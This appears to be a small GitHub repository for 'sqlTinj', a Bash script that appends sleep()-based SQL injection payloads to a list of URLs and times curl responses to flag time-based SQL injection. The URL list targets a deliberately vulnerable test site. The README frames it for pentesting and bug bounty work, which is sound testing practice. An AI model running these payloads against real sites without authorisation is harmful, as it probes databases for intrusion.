├── README.md
├── sqlTinj.sh
└── urls.txt
/README.md:
--------------------------------------------------------------------------------
1 | # sqlTinj
2 | Automation: Bash script wrapper to find and verify time base sql injection
3 |
4 | ## Getting started
5 | Usage:
6 |
7 | Syntax:
8 |
9 | sqlTinj -l "urllist" -z "zerosecdelay" -f "fivesecdelay" -t "tensecdelay" -a "useragent"
10 |
11 |
12 | 
13 |
14 |
15 | options:
16 |
17 | l List of urls file.
18 |
19 | z Time based sql injection payload with zero sec delay.
20 |
21 | f Time based sql injection payload with five sec delay.
22 |
23 | t Time based sql injection payload with ten sec delay.
24 |
25 | a Customer User Agent.
26 |
27 | h For HELP
28 |
29 | Example:
30 |
31 | sqlTinj -l urls.txt -z "sleep(0)#" -f "sleep(5)#" -t "sleep(10)#" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"
32 |
33 | OR
34 |
35 | ./sqlTinj.sh -l urls.txt -z "sleep(0)#" -f "sleep(5)#" -t "sleep(10)#" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0"
36 |
37 | 
38 |
39 |
40 | Note: This only for educational suppose and for Pentester and bugbounty hunting
41 |
--------------------------------------------------------------------------------
/sqlTinj.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | usage () {
4 | echo -n $'\E[31m'
5 | echo $''
6 | echo $' _,.'
7 | echo $' ,` -.)'
8 | echo $' \'( _/\'-\\\\-.'
9 | echo $' /,|`--._,-^| ,'
10 | echo $' \\_| |`-._/|| ,\'|'
11 | echo $' | `-, / | / / '
12 | echo $' | || | / /'
13 | echo $' `r-._||/ __ / /'
14 | echo $' __,-<_ )`-/ `./ /'
15 | echo $'\' \\ `---\' \\ / /
16 | ▒█░▄▀ ▀█▀ ▒█░░░ ▒█░░░ ▒█▀▄▀█ ▒█▀▀▀█ ▒█▄░▒█ ▒█▀▀█ ░█▀▀█ ▒█▀▀█ ▄█░ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄
17 | ▒█▀▄░ ▒█░ ▒█░░░ ▒█░░░ ▒█▒█▒█ ▒█░░▒█ ▒█▒█▒█ ▒█░▄▄ ▒█▄▄█ ▒█▄▄▀ ░█░ ▀▄▄█ ▀▄▄█ █▄▄░
18 | ▒█░▒█ ▄█▄ ▒█▄▄█ ▒█▄▄█ ▒█░░▒█ ▒█▄▄▄█ ▒█░░▀█ ▒█▄▄█ ▒█░▒█ ▒█░▒█ ▄█▄ ░▄▄▀ ░▄▄▀ ▀▄▄▀'
19 | echo $' | |./ /'
20 | echo $' / // /'
21 | echo $'\\_/\' \\ |/ /'
22 | echo $' | | _,^-\'/ /'
23 | echo $' | , `` (\\/ /_'
24 | echo $' \\,.->._ \\X-=/^'
25 | echo $' ( / `-._//^`'
26 | echo $' `Y-.____(__}'
27 | echo $' | {__)'
28 | echo $' ()`'
29 | echo -e "\e[32m+--------------------------------------+"
30 | echo -e "\e[32m| Code By: Santosh Kumar Sha |"
31 | echo -e "\e[32m| github: @Killmongar1996 |"
32 | echo -e "\e[32m+--------------------------------------+"
33 | echo -e "\e[31mBash script wrapper to find and verify time base sql injection"
34 | echo
35 | echo -e "\e[32m Syntax $BASH_SOURCE -l -z -f -t -a "
36 | echo
37 | echo -e "\e[31moptions:"
38 | echo -e "\e[33m l List of urls file"
39 | echo -e "\e[33m z Time based sql injection payload with zero sec delay."
40 | echo -e "\e[33m f Time based sql injection payload with five sec delay."
41 | echo -e "\e[33m t Time based sql injection payload with ten sec delay."
42 | echo -e "\e[33m a Customer User Agent ."
43 | echo -e "\e[33m h For HELP"
44 | echo ""
45 | echo -e "\e[33m Note: This only for educational suppose and for Pentester and bugbounty hunting"
46 | }
47 |
48 | while getopts l:z:f:t:a:h flag
49 | do
50 | case "${flag}" in
51 | l) urllist=${OPTARG};;
52 | z) zerosecdelay=${OPTARG};;
53 | f) fivesecdelay=${OPTARG};;
54 | t) tensecdelay=${OPTARG};;
55 | a) useragent=${OPTARG};;
56 | h) echo ""; usage; exit;;
57 | esac
58 | done
59 |
60 |
61 | while IFS= read -r line
62 | do
63 | # take action on $line #
64 | name1=$(curl -o /dev/null -s -w 'Total: %{time_total}s\n' "$line${zerosecdelay}" -H "User-Agent: ${useragent}" | sed "s/Total: //" | sed "s/s//" )
65 | name2=$(curl -o /dev/null -s -w 'Total: %{time_total}s\n' "$line${fivesecdelay}" -H "User-Agent: ${useragent}" | sed "s/Total: //" | sed "s/s//" )
66 | name3=$(curl -o /dev/null -s -w 'Total: %{time_total}s\n' "$line${tensecdelay}" -H "User-Agent: ${useragent}" | sed "s/Total: //" | sed "s/s//" )
67 |
68 | payload1=$(echo $name1 |sed "s/[.].*$//")
69 | payload2=$(echo $name2 |sed "s/[.].*$//")
70 | payload3=$(echo $name3 |sed "s/[.].*$//")
71 |
72 | if [ $payload2 -gt $payload1 ]
73 | then
74 | if [ $payload3 -gt $payload2 ]
75 | then
76 | echo "$(tput setaf 1) ${line}${tensecdelay} $(tput setaf 4) is $(tput setaf 3) vulnerable to time base sql injection using payload"
77 | fi
78 | fi
79 | done <<< $(cat $urllist)
80 |
81 | if ((OPTIND == 1))
82 | then
83 | echo "No options specified"
84 | usage
85 | exit
86 | fi
--------------------------------------------------------------------------------
/urls.txt:
--------------------------------------------------------------------------------
1 | http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=
2 | http://testphp.vulnweb.com/artist.php?artist=
3 | http://testphp.vulnweb.com/artists.php?artist=
4 | http://testphp.vulnweb.com/listproducts.php?cat=
5 | http://testphp.vulnweb.com/hpp/params.php?p=
6 | http://testphp.vulnweb.com/listproducts.php?artist=
7 | http://testphp.vulnweb.com/listproducts.php?cat=
8 | http://testphp.vulnweb.com/listproducts.php?id=
9 | http://testphp.vulnweb.com/redir.php?r=
10 | http://testphp.vulnweb.com/showimage.php?file=
11 | http://testphp.vulnweb.com:80/AJAX/infocateg.php?id=
12 | http://testphp.vulnweb.com:80/admin/?C=
13 | http://testphp.vulnweb.com:80/artists.php?artist+=
14 | http://testphp.vulnweb.com:80/bxss/vuln.php?id=
15 | http://testphp.vulnweb.com:80/comment.php?aid=
16 | http://testphp.vulnweb.com:80/comment.php?pid=
17 | http://testphp.vulnweb.com:80/hpp/?pp=
18 | http://testphp.vulnweb.com:80/hpp/index.php?pp=
19 | http://testphp.vulnweb.com:80/product.php?pic=
20 | http://testphp.vulnweb.com:80/search.php?test=
21 | http://testphp.vulnweb.com:80/secured/phpinfo.php?test=
22 |
--------------------------------------------------------------------------------